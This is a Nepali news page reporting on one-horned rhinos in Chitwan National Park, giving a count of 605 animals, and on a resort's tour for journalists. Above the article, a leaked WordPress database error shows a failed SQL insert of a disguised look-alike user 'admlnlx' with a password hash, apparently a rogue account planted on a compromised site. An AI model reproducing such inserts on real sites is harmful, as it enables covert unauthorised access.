WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQXCMfZls.2shQH5zMqQ7F4hY03oe2.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 18:57:59', '', 'admlnlx', 'admlnlx')
चितवन, माघ ९–
चितवन राष्ट्रिय निकुञ्ज विश्वकै दुर्लभ मानिएको एक सिंगे गैंडाको खानीको रुपमा मानिन्छ । पछिल्लो समय गैंडाको मात्रै नभई हरेक जीवजन्तुको प्रमुख बासस्थानको रुपमा चितवन राष्ट्रिय निकुञ्ज रहेको छ । चितवन राष्ट्रिय निकुञ्ज घुम्न पुग्ने पर्यटक गैंडा नहेरी फर्कदैनन् ।
निकुञ्जमा जताततै गैंडा देख्न सकिन्छ । नवलपरासीको अमलटाँरीमा रहेको टेम्पल टाईगर जंगल रिसोर्टले पत्रकारहरुलाई आफ्नो प्याकेज अन्तरगत निकुञ्जको भ्रमण गराउँदा सहजै एक सिंगे गैंडा देखिएको थियो । सो रिसोर्ट यसअघि निकुञ्ज भित्रै रहेको थियो । सरकारले नविकरण नगरेपछि रिसोर्ट निकुञ्ज बाहिर आउनु परेको थियो । रिसोर्ट निकुञ्ज बाहिर आएपछि विदेशबाट आउने भिआईपी पर्यटकको संख्यामा कमी आएको रिसोर्टले जनाएको छ ।
पछिल्लो गणना अनुसार चितवन राष्ट्रिय निकुञ्जमा ६ सय ५ वटा एक सिंगे गैंडा रहेको छ । जसमा वयस्क ४३४, अर्धवयस्क ५५ र ११६ वटा बच्चा गैंडा छन् ।
हेर्नुहोस निकुञ्जमा देखिएका गैंडाका केही तस्विरहरुः
तस्विरः राजु चौधरी/नारायणी अनलाईन









